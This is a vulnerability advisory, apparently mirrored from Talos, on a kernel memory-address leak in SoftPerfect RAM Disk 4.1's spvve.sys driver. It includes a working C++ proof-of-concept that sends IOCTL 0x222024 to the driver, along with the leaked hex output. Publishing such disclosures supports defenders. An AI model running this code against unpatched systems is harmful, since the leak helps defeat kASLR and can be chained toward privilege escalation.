Search...

SoftPerfect RAM Disk spvve.sys 0x222024 information disclosure vulnerability

2020-08-04T00:00:00

ID TALOS-2020-1122
Type talos
Reporter Talos Intelligence
Modified 2020-08-04T00:00:00

Description

Summary

An exploitable information disclosure vulnerability exists in SoftPerfect’s RAM Disk 4.1 spvve.sys driver. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.

Tested Versions

SoftPerfect RAM Disk 4.1

Product URLs

<https://www.softperfect.com/products/ramdisk/>

CVSSv3 Score

3.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

CWE

CWE-200 - Information Exposure

Details

SoftPerfect RAM Disk is a high-performance RAM disk application that lets the user store a disk from their computer stored on the device’s memory.

The spvve.sys driver creates a device object Device\SoftPerfectVolume that is accessible to any user on the system so any user sending specially crafted I/O request packet (IRP) can cause information disclosure (leak kernel pool memory address).

int main()
{
    const wchar_t* errmsg = NULL;
    LPCWSTR deviceName = L"\\Device\\SoftPerfectVolume";
    HANDLE hDevice = OpenDeviceWorker(deviceName, GENERIC_READ | GENERIC_WRITE, &errmsg, TRUE);
    if (hDevice == INVALID_HANDLE_VALUE) {
        if (errmsg == NULL) {
            printf("error: something in OpenDeviceEx failed\n");
        }
        else {
            wprintf(L"error: %s\n", errmsg);
        }
    }

    const DWORD inBufferSize = 8;
    const DWORD outBufferSize = 16;
    PBYTE inBuffer = new BYTE[inBufferSize];
    PBYTE outBuffer = new BYTE[outBufferSize];;
    DWORD returned;

    //kernel pool memory address leak
    printf("DeviceIoControl IOCTL : 0x222024\n");
    DeviceIoControl(hDevice,
        0x222024,
        inBuffer,
        inBufferSize,
        outBuffer,
        outBufferSize,
        &returned,
        0);

    neolib::hex_dump(outBuffer, outBufferSize, std::cout);

    return 0;
}

output:

C:\tmp\ramdisk&gt;RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : ....h....2...2.. D0 96 EA 00 68 92 EA 00 00 32 EA 00 00 32 EA 00

C:\tmp\ramdisk&gt;RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : h8O...O......0.. 68 38 4F 01 C0 00 4F 01 07 00 00 07 B0 30 00 00

C:\tmp\ramdisk&gt;RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : .!.............. A8 21 FD 00 C0 00 FD 00 00 00 00 00 00 00 00 00

This kind of vulnerability can allow an attacker to bypass kASLR mitigation and open possibility to local privilage escalation when used in conjunction with another vulnerability.

Timeline

2020-07-16 - Vendor Disclosure
2020-07-23 - Vendor Patched
2020-08-04 - Public Release

JSON Vulners Source

Initial Source

{"id": "TALOS-2020-1122", "vendorId": null, "type": "talos", "bulletinFamily": "info", "title": "SoftPerfect RAM Disk spvve.sys 0x222024 information disclosure vulnerability", "description": "### Summary\n\nAn exploitable information disclosure vulnerability exists in SoftPerfect\u2019s RAM Disk 4.1 spvve.sys driver. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.\n\n### Tested Versions\n\nSoftPerfect RAM Disk 4.1\n\n### Product URLs\n\n<https://www.softperfect.com/products/ramdisk/>\n\n### CVSSv3 Score\n\n3.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\n\n### CWE\n\nCWE-200 - Information Exposure\n\n### Details\n\nSoftPerfect RAM Disk is a high-performance RAM disk application that lets the user store a disk from their computer stored on the device\u2019s memory.\n\nThe spvve.sys driver creates a device object `Device\\SoftPerfectVolume` that is accessible to any user on the system so any user sending specially crafted I/O request packet (IRP) can cause information disclosure (leak kernel pool memory address).\n \n \n int main()\n {\n \tconst wchar_t* errmsg = NULL;\n \tLPCWSTR deviceName = L\"\\\\Device\\\\SoftPerfectVolume\";\n \tHANDLE hDevice = OpenDeviceWorker(deviceName, GENERIC_READ | GENERIC_WRITE, &errmsg, TRUE);\n \tif (hDevice == INVALID_HANDLE_VALUE) {\n \t\tif (errmsg == NULL) {\n \t\t\tprintf(\"error: something in OpenDeviceEx failed\\n\");\n \t\t}\n \t\telse {\n \t\t\twprintf(L\"error: %s\\n\", errmsg);\n \t\t}\n \t}\n \n \tconst DWORD inBufferSize = 8;\n \tconst DWORD outBufferSize = 16;\n \tPBYTE inBuffer = new BYTE[inBufferSize];\n \tPBYTE outBuffer = new BYTE[outBufferSize];;\n \tDWORD returned;\n \n \t//kernel pool memory address leak\n \tprintf(\"DeviceIoControl IOCTL : 0x222024\\n\");\n \tDeviceIoControl(hDevice,\n \t\t0x222024,\n \t\tinBuffer,\n \t\tinBufferSize,\n \t\toutBuffer,\n \t\toutBufferSize,\n \t\t&returned,\n \t\t0);\n \n \tneolib::hex_dump(outBuffer, outBufferSize, std::cout);\n \n \treturn 0;\n }\n \n\noutput:\n \n \n C:\\tmp\\ramdisk>RamDiskMemLeak.exe\n DeviceIoControl IOCTL : 0x222024\n 0000 : ....h....2...2.. D0 96 EA 00 68 92 EA 00 00 32 EA 00 00 32 EA 00\n \n C:\\tmp\\ramdisk>RamDiskMemLeak.exe\n DeviceIoControl IOCTL : 0x222024\n 0000 : h8O...O......0.. 68 38 4F 01 C0 00 4F 01 07 00 00 07 B0 30 00 00\n \n C:\\tmp\\ramdisk>RamDiskMemLeak.exe\n DeviceIoControl IOCTL : 0x222024\n 0000 : .!.............. A8 21 FD 00 C0 00 FD 00 00 00 00 00 00 00 00 00\t\n \n\nThis kind of vulnerability can allow an attacker to bypass kASLR mitigation and open possibility to local privilage escalation when used in conjunction with another vulnerability.\n\n### Timeline\n\n2020-07-16 - Vendor Disclosure \n2020-07-23 - Vendor Patched \n2020-08-04 - Public Release\n", "published": "2020-08-04T00:00:00", "modified": "2020-08-04T00:00:00", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1122", "reporter": "Talos Intelligence", "references": [], "cvelist": ["CVE-2020-13523"], "immutableFields": [], "lastseen": "2022-01-26T11:43:44", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-13523"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-13523"]}]}, "exploitation": null, "vulnersScore": 5.7}, "_state": {"dependencies": 1645789506}}

{"cve": [{"lastseen": "2022-04-28T21:38:57", "description": "An exploitable information disclosure vulnerability exists in SoftPerfect\u2019s RAM Disk 4.1 spvve.sys driver. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-08-04T19:15:00", "type": "cve", "title": "CVE-2020-13523", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13523"], "modified": "2022-04-28T19:15:00", "cpe": ["cpe:/a:softperfect:ram_disk:4.1"], "id": "CVE-2020-13523", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13523", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:softperfect:ram_disk:4.1:*:*:*:*:windows:*:*"]}]}